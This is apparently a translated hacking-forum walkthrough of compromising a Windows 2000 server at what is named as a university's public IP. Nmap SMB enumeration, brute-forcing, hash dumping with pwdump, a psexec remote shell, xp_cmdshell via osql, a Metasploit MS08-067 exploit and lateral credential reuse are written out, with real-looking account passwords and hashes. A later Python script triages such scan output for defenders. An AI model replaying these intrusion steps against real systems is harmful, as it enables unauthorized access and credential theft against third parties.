Guangxi Normal website http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r(
SF:GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use this script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to exploit the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the user names and the captured hashes to try logging in across the whole internal network segment

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
Attack successful, a simple msf+nmap attack~~
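Every host-script block in the runs above (smb-enum-shares, smb-brute, smb-pwdump, smb-check-vulns) is a finding an administrator should have caught first. As an added example that is not part of the original post, the Python script below parses nmap's normal output for exactly these "Host script results" blocks and turns them into a prioritised list of defender findings: shares that allow anonymous access, accounts that accept a blank or guessed password, accounts that still have an LM hash stored, and hosts the vulnerability check flags as VULNERABLE. The SAMPLE text is constructed from the scan output on this page; the function names (parse_host_scripts, triage, report) are mine, not nmap's.

```python
"""Triage nmap SMB host-script output into defender findings (added example)."""
import re
from collections import defaultdict

# Constructed sample: two hosts, condensed from the nmap runs on this page.
SAMPLE = """\
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|_  test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Nmap done: 2 IP addresses (2 hosts up) scanned in 30.00 seconds
"""

# "Nmap scan report for bogon (1.2.3.4)" or "Nmap scan report for 1.2.3.4"
HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?(\d+\.\d+\.\d+\.\d+)\)?")
# "| smb-enum-shares:" opens a script block; "|_" marks the last line of a block
SCRIPT_RE = re.compile(r"^\|_?\s+(smb-[\w-]+):\s*$")


def parse_host_scripts(text):
    """Return {host_ip: {script_name: [stripped body lines]}} from nmap normal output."""
    hosts = defaultdict(lambda: defaultdict(list))
    host = script = None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host, script = m.group(1), None
            continue
        if host is None or not raw.startswith("|"):
            continue
        m = SCRIPT_RE.match(raw)
        if m:
            script = m.group(1)
            hosts[host].setdefault(script, [])
        elif script is not None:
            # drop the "|", "|_" prefix and indentation, keep the text
            hosts[host][script].append(raw.lstrip("|_").strip())
    return hosts


def triage(hosts):
    """Turn parsed script output into (host, severity, message) findings."""
    findings = []
    for host, scripts in hosts.items():
        share = None
        for line in scripts.get("smb-enum-shares", []):
            if line.startswith("Anonymous access:"):
                access = line.split(":", 1)[1].strip()
                if access != "<none>":  # null-session readable share
                    findings.append((host, "medium", f"share {share} allows anonymous {access}"))
            else:
                share = line  # a share name line precedes its access line
        for line in scripts.get("smb-brute", []):
            if "Login was successful" in line:
                user, _, pw = line.split(" => ", 1)[0].partition(":")
                if pw == "<blank>":
                    findings.append((host, "critical", f"account {user} accepts a blank password"))
                else:
                    findings.append((host, "high", f"account {user} accepts a guessable password"))
        for line in scripts.get("smb-pwdump", []):
            if " => " not in line:
                continue
            acct, _, hashes = line.partition(" => ")
            user = acct.split(":", 1)[0]
            lm, _, nt = hashes.partition(":")
            if nt.startswith("NO PASSWORD"):  # pwdump's marker for an empty password
                findings.append((host, "critical", f"account {user} has an empty password"))
            elif not lm.startswith("NO PASSWORD"):  # a real LM hash is still being stored
                findings.append((host, "medium", f"account {user} has an LM hash stored (LM hashing not disabled)"))
        for line in scripts.get("smb-check-vulns", []):
            if line.endswith(": VULNERABLE"):  # excludes "NOT VULNERABLE"
                findings.append((host, "critical", f"unpatched: {line.split(':', 1)[0]}"))
    return findings


def report(findings):
    """One line per finding, most severe first, then by host."""
    rank = {"critical": 0, "high": 1, "medium": 2}
    ordered = sorted(findings, key=lambda f: (rank[f[1]], f[0]))
    return [f"[{sev.upper():8}] {host}: {msg}" for host, sev, msg in ordered]


if __name__ == "__main__":
    for line in report(triage(parse_host_scripts(SAMPLE))):
        print(line)
```

Run it against saved `nmap -oN` output instead of SAMPLE to get the same list for a real scan of your own network; every line it prints maps to a fix (remove anonymous access to IPC$, set and enforce passwords, set NoLMHash, apply the missing patch).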